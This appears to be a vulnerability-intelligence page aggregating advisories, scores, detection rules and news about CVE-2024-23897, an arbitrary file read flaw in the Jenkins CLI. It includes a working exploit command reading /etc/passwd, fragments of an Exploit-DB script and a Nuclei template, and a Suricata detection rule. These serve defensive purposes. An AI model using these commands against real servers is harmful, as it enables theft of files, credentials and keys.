CVE-2024-23897
published 2024-01-24CVE-2024-23897: Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-09-09
Exploited in the wild
EPSS
100.00%
100.0th percentile
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | git_server_plugin | — | — |
| jenkins | gitlab_branch_source_plugin | — | — |
| jenkins | jenkins | < 2.426.3 | 2.426.3 |
| jenkins | jenkins | < 2.442 | 2.442 |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_uses_the_strict_crumb_issuer_plugin | — | — |
| jenkins | jenkins_weekly | — | — |
| jenkins | log_command_plugin | — | — |
| jenkins | matrix_project_plugin | — | — |
| jenkins | qualys_policy_compliance_scanning_connector_plugin | — | — |
| jenkins | red_hat_dependency_analytics_plugin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandjava -jar jenkins-cli.jar -s http://172.17.0[.]1:8080/ -auth admin:pass reload-job @/etc/passwd↗
- →Monitor Jenkins access logs and web server logs for POST requests to the /cli endpoint containing the '@' character followed by a file path in the arguments — this is the core exploit pattern for CVE-2024-23897. ↗
- →A SIEM rule should flag any Jenkins CLI command containing the '@' character in its arguments, as this is the core of the exploit. ↗
- →The exploit uses the Jenkins PlainCLIProtocol binary format: each message is framed with a 4-byte big-endian int length, followed by a 1-byte opcode, then data. Signature-based detection should look for this binary framing in POST bodies to /cli. ↗
- →Attack requests from Windows machines to Jenkins use windows-1252 encoding; requests from Linux machines use UTF-8. Encoding in the CLI POST body can help distinguish attacker platform. ↗
- →WebSocket-based exploit requests will have masking applied to the data, making user input invisible in captures. Inspect masked WebSocket frames to the Jenkins CLI endpoint as a potential attack vector. ↗
- →Unauthenticated attackers can exploit CLI commands including 'help', 'who-am-i', 'restart', 'shutdown', and 'enable-job' with the '@' file-read technique. Monitor for these commands with '@' arguments in Jenkins logs. ↗
- →Authenticated attackers can use CLI commands such as 'connect-node', 'reload-job', 'delete-job', 'delete-node', 'disconnect-node', 'offline-node', and 'online-node' with '@/path/to/file' to read entire files. Alert on these commands with '@' prefixed arguments. ↗
- →Check Point IPS blade signature 'Jenkins Information Disclosure (CVE-2024-23897)' provides detection coverage for this vulnerability. ↗
- ·Unauthenticated attackers are limited to reading the first few lines of files; the exact number of lines depends on the CLI command used. Authenticated users with Overall/Read permission can read entire files. ↗
- ·CVE-2024-23897 is exploitable via HTTP, WebSocket, and SSH, with HTTP and WebSocket having the highest chance of exploitation. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
cisa·2024-08-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] CWE-27 Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Vulnerability: Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Affected: Jenkins Jenkins Command Line Interface (CLI)
Jenkins Command Line Interface (CLI) contains a path traversal vulnerability that allows attackers limited read access to certain files, which can lead to code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314; https://nvd.nist.gov/vuln/detail/CVE-2024-23897
Remediation Due Date: 2024-09-09
Oracle
Oracle Oracle Communications Risk Matrix: Automated Test Suite Framework (Jenkins) — CVE-2024-23897
vendor_oracle·2024-07-15·CVSS 9.8
CVE-2024-23897 [CRITICAL] Oracle Oracle Communications Risk Matrix: Automated Test Suite Framework (Jenkins) — CVE-2024-23897
Oracle Oracle Communications Risk Matrix: Automated Test Suite Framework (Jenkins) vulnerability
CVE: CVE-2024-23897
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2024 (JUL 2024)
Jenkins
Jenkins Security Advisory 2024-01-24
vendor_jenkins·2024-01-24·CVSS 9.8
CVE-2023-6147 [CRITICAL] Jenkins Security Advisory 2024-01-24
Title: Jenkins Security Advisory 2024-01-24
Jenkins Security Advisory 2024-01-24
Jenkins Security Home
For Administrators
Overview
Terminology
Vulnerabilities and Scoring
Security Advisories
Security Issues
Advisory Schedule
Vulnerabilities in Plugins
How We Fix Security Issues
For Reporters
Reporting Vulnerabilities
Jenkins CNA
For Maintainers
Overview
Vulnerabilities in Plugins
Jenkins Security Team
About
Contributions
This advisory announces vulnerabilities in the following Jenkins deliverables:
Jenkins (core)
Git server
Plugin
GitLab Branch Source
Plugin
Log Command
Plugin
Matrix Project
Plugin
Qualys Policy Compliance Scanning Connector
Plugin
Red Hat Depen
Red Hat
jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE
vendor_redhat·2024-01-09·CVSS 9.8
CVE-2024-23897 [CRITICAL] CWE-88 jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE
jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
A flaw was found in Jenkins, which uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces the "@" character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default; Jenkins 2.441 and earlier as well as LTS 2.426.2 and earlier do not disable it.
Mitigat
OSV
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
osv·2024-01-24
CVE-2024-23897 [CRITICAL] Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.
This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.
* Attackers with Overall/Read permission can read entire files.
* Attackers w
GHSA
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
ghsa·2024-01-24
CVE-2024-23897 [CRITICAL] CWE-22 Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE
Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.
This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.
* Attackers with Overall/Read permission can read entire files.
* Attackers w
VulnCheck
Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-23897 [CRITICAL] CWE-27 Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
Jenkins Command Line Interface (CLI) contains a path traversal vulnerability that allows attackers limited read access to certain files, which can lead to code execution.
Affected: Jenkins Jenkins Command Line Interface (CLI)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-30&host_type=src&vulnerability=cve-2024-23897; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-31&host_type=src&vulnerability=cve-2024-23897; https://dashboard.shadowserver.org/statistics/hone
Suricata
ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)
suricata·2024-01-29·CVSS 9.8
CVE-2024-23897 [CRITICAL] ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)
ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Jenkins Unauthenticated RCE Attempt Observed (CVE-2024-23897)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cli?remoting="; startswith; fast_pattern; http.request_body; content:"|00|"; within:30; content:"@"; within:10; reference:cve,2024-23897; classtype:attempted-admin; sid:2050517; rev:2; metadata:affected_product Jenkins, attack_target Server, created_at 2024_01_29, cve CVE_2024_23897, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mit
Exploit-DB
Jenkins 2.441 - Local File Inclusion
exploitdb·2024-04-15·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins 2.441 - Local File Inclusion
Jenkins 2.441 - Local File Inclusion
---
# Exploit Title: Jenkins 2.441 - Local File Inclusion
# Date: 14/04/2024
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
# Version: 2.441
# Tested on: Debian 12 (Bookworm)
# CVE: CVE-2024-23897
from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall
class Exploit(Thread):
def __init__(self, url: str, identifier: str):
Thread.__init__(self)
self.daemon = True
self.url = url
self.params = {"remoting": "false"}
self.identifier = identifier
self.stop_thread = False
self.listen = False
def run(self
Metasploit
Jenkins cli Ampersand Replacement Arbitrary File Read
metasploit
Jenkins cli Ampersand Replacement Arbitrary File Read
Jenkins cli Ampersand Replacement Arbitrary File Read
This module utilizes the Jenkins cli protocol to run the `help` command. The cli is accessible with read-only permissions by default, which are all thats required. Jenkins cli utilizes `args4j's` `parseArgument`, which calls `expandAtFiles` to replace any `@` with the contents of a file. We are then able to retrieve the error message to read up to the first two lines of a file. Exploitation by hand can be done with the cli, see markdown documents for additional instructions. There are a few exploitation oddities: 1. The injection point for the `help` command requires 2 input arguments. When the `expandAtFiles` is called, each line of the `FILE_PATH` becomes an input argument. If a file only contains one line, it will throw an error: `E
Nuclei
Jenkins < 2.441 - Arbitrary File Read
nuclei·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins < 2.441 - Arbitrary File Read
Jenkins (c === 'x' ? Math.random() * 16 | 0 : (Math.random() * 16 | 0 & 0x3 | 0x8)).toString(16));
let conn, conn2;
try { conn = m.OpenTLS('tcp', address) } catch { conn = m.Open('tcp', address)}
conn.Send(`POST /cli?remoting=false HTTP/1.1\r\nHost:${Host}\r\nSession: ${session_id}\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n`);
resp = conn.RecvString(1000)
try { conn2 = m.OpenTLS('tcp', address) } catch { conn2 = m.Open('tcp', address)}
conn2.Send(`POST /cli?remoting=false HTTP/1.1\r\nHost:${Host}\r\nContent-type: application/octet-stream\r\nSession: ${session_id}\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n${Body}`)
resp2 = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Host}}"
Port: 80,443 # if
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemys Playbook
Attackers Move Fast
How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Qualys
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
#### Table of Contents
- Know Your Enemys Playbook
- Attackers Move Fast
- How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against ev
Bleepingcomputer
CISA warns of Jenkins RCE bug exploited in ransomware attacks
blogs_bleepingcomputer·2024-08-19·CVSS 9.8
[CRITICAL] CISA warns of Jenkins RCE bug exploited in ransomware attacks
## CISA warns of Jenkins RCE bug exploited in ransomware attacks
## Sergiu Gatlan
CISA has added a critical Jenkins vulnerability that can be exploited to gain remote code execution to its catalog of security bugs, warning that it's actively exploited in attacks.
Jenkins is a widely used open-source automation server that helps developers automate the process of building, testing, and deploying software through continuous integration (CI) and continuous delivery (CD).
Tracked as CVE-2024-23897 , this flaw is caused by a weakness in the args4j command parser that unauthenticated attackers can exploit to read arbitrary files on the Jenkins controller file system through the built-in command line interface (CLI).
"This command parser has a feature that replaces an @ character followed b
Qualys
Cybersecurity Threat Landscape 2024 Midyear Review
blogs_qualys·2024-08-06
Cybersecurity Threat Landscape 2024 Midyear Review
## Table of Contents
Key Takeaways from the Threat Landscape Report 2024
Vulnerability and Threat Analysis in the Cybersecurity Landscape 2024
Cyber Threat Landscape 2024 A Detailed Review
Key Statistics and Their Impact on the 2024 Cybersecurity Landscape
Mid-2024s Most Exploited Vulnerabilities in the Cybersecurity Landscape
Conclusion
As we navigate the complexities of 2024, it’s crucial to pause and reflect on the evolving threat landscape that surrounds us. This moment offers a unique opportunity to scrutinize our triumphs and missteps, understand the events that have decisively shaped our environment, and consider those that have subtly influenced it. By extracting key lessons from our recent experiences, we can fortify our strategies and prepare more effectively for the emerg
Qualys
Oracle Critical Patch Update, July 2024 Security Update Review
blogs_qualys·2024-07-17
Oracle Critical Patch Update, July 2024 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle released its third quarterly edition of Critical Patch Update, which contains patches for 386 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in various product families, including third-party components in Oracle products.
In the third quarterly Oracle Critical Patch Update, Oracle Communications received the highest number of patches, 95, constituting about 24% of the total patches released. Oracle Financial Services Applications and Oracle Fusion Middleware foll
Qualys
Oracle Critical Patch Security Update: July 2024 Review | Qualys
blogs_qualys·2024-07-17
Oracle Critical Patch Security Update: July 2024 Review | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle released its third quarterly edition of Critical Patch Update, which contains patches for 386 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in various product families, including third-party components in Oracle products.
In the third quarterly Oracle Critical Patch Update, Oracle Communications received the highest number of patches, 95, constituting about 24% of the total patches released. Oracle Financial Services Applications and Oracle Fusion Middlewa
Zscaler
CVE-2024-3094 | ThreatLabz
blogs_zscaler·2024-04-01·CVSS 10.0
[CRITICAL] CVE-2024-3094 | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Checkpoint
25th March – Threat Intelligence Report
blogs_checkpoint·2024-03-25
CVE-2024-29943 25th March – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 25th March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 25th March, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Japanese tech company Fujitsu discovered malware on its work computers, risking exposure of customer data. The company, a leading IT firm, detected unauthorized access that potentially allowed personal and customer information to be illicitly extracted. Immediate actions included isolating affected computers and enhancing mon
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Exploits & Vulnerabilities
# Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji
2024/03/19
Read time: ( words)
Save to Folio
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897. Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally, auth
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Exploits & Vulnerabilities
## Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji 2024/03/19 Read time: ( words)
Save to Folio
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897 . Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally, aut
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Exploits & Vulnerabilities
## Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji Mar 19, 2024 Read time: ( words)
Save to Folio
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897 . Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally, a
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Ausnutzung von Schwachstellen
## Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji Mar 19, 2024 Read time: ( words)
Save to Folio
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897 . Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Exploits & Vulnerabilities
## Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji Mar 19, 2024 Read time: ( words)
Save to Folio
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897 . Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally, a
Trendmicro
Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
blogs_trendmicro·2024-03-19·CVSS 9.8
CVE-2024-23897 [CRITICAL] Jenkins Args4j CVE-2024-23897 Files Exposed Code at Risk
Exploits y vulnerabilidades
## Jenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897.
By: Arun Shaji Mar 19, 2024 Read time: ( words)
Save to Folio
Jenkins, a popular open-source automation server, was discovered to be affected by a file read vulnerability, CVE-2024-23897 . Jenkins employs a built-in Command-Line Interface (CLI) to facilitate interaction from script or shell environments and uses the args4j library to parse command arguments and options on the Jenkins controller during CLI command processing. The vulnerability exists in this library, allowing an unauthenticated user to read the first few lines of any files on the file system. Additionally,
Zscaler
ScreenConnect Vulnerabilities | ThreatLabz
blogs_zscaler·2024-03-11·CVSS 10.0
[CRITICAL] ScreenConnect Vulnerabilities | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Zscaler
CVE-2024-23897 | ThreatLabz
blogs_zscaler·2024-02-06·CVSS 9.8
[CRITICAL] CVE-2024-23897 | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Wiz
Crying Out Cloud - February Newsletter | Wiz
blogs_wiz·2024-02-01·CVSS 9.8
CVE-2023-33246 [CRITICAL] Crying Out Cloud - February Newsletter | Wiz
This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure. Let's dive in.
Here are our top picks!
## 🐞 High Profile Vulnerabilities
Apache RocketMQ RCE vulnerability exploited in-the-wild
In August 2023 researchers identified attackers exploiting CVE-2023-33246, a critical vulnerability in Apache RocketMQ, to install the DreamBus bot, a malware strain last reported about publicly in 2021. On January 5, 2024 Apache stated that the patch for CVE-2023-33246 was in fact insufficient, and an additional CVE was assigned to the bypass - CVE-2023-37582. The latter vulnerability is also being exploited in the wild, so it is recommended to patc
Checkpoint
29th January – Threat Intelligence Report
blogs_checkpoint·2024-01-29
CVE-2024-23222 29th January – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 29th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th January, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Following the reports on Russia-affiliated APT29 (AKA Cozy Bear, Midnight Blizzard) attack against Microsoft, also Hewlett-Packard Enterprise acknowledged it was attacked by the same threat actor. While Microsoft detected the breach on January 12 and the password-spray attack began in November 2023; HPE’s investigation po
Bleepingcomputer
45k Jenkins servers exposed to RCE attacks using public exploits
blogs_bleepingcomputer·2024-01-29·CVSS 9.8
CVE-2024-23897 [CRITICAL] 45k Jenkins servers exposed to RCE attacks using public exploits
## 45k Jenkins servers exposed to RCE attacks using public exploits
## Bill Toulas
Researchers found roughly 45,000 Jenkins instances exposed online that are vulnerable to CVE-2024-23897, a critical remote code execution (RCE) flaw for which multiple public proof-of-concept (PoC) exploits are in circulation.
Jenkins is a leading open-source automation server for CI/CD, allowing developers to streamline the building, testing, and deployment processes. It features extensive plugin support and serves organizations of various missions and sizes.
On January 24, 2024, the project released versions 2.442 and LTS 2.426.3 to fix CVE-2024-23897, an arbitrary file read problem that can lead to executing arbitrary command-line interface (CLI) commands.
The issue arises from the CLI's feature that
Bleepingcomputer
Exploits released for critical Jenkins RCE flaw, patch now
blogs_bleepingcomputer·2024-01-28·CVSS 9.8
[CRITICAL] Exploits released for critical Jenkins RCE flaw, patch now
## Exploits released for critical Jenkins RCE flaw, patch now
## Bill Toulas
Multiple proof-of-concept (PoC) exploits for a critical Jenkins vulnerability allowing unauthenticated attackers to read arbitrary files have been made publicly available, with some researchers reporting attackers actively exploiting the flaws in attacks.
Jenkins is an open-source automation server widely used in software development, particularly for Continuous Integration (CI) and Continuous Deployment (CD).
It plays a critical role in automating various parts of the software development process, like building, testing, and deploying applications. It supports over a thousand integration plugins and is used by organizations of all sizes, including large enterprises.
SonarSource researchers discovered two fla
Sentinelone
Black Basta
blogs_sentinelone·2022-11-30
Black Basta
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Huntress
CVE-2024-23897 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 9.8
CVE-2024-23897 [CRITICAL] CVE-2024-23897 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2024-23897 Vulnerability
Published: 10/27/2025
Written by: Monica Burgess
CVE-2024-23897 is a high-severity arbitrary file read vulnerability affecting the popular Jenkins automation server. It stems from an issue in the command line interface (CLI) feature, allowing an attacker to read any file on the Jenkins controller's file system. This flaw lets unauthenticated attackers read the first few lines of files, while attackers with "Overall/Read" permissions can access entire files. This can lead to remote code execution (RCE) by exposing sensitive information like cryptographic keys.
## When was it discovered?
The CVE-2024-23897 vulnerability was publicly disclosed by Jenkins as part of a security advisory on January 24, 2024. The advisory detailed this vulnerability along with
Sentinelone
Black Basta
blogs_sentinelone
Black Basta
# Black Basta Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Black Basta Ransomware
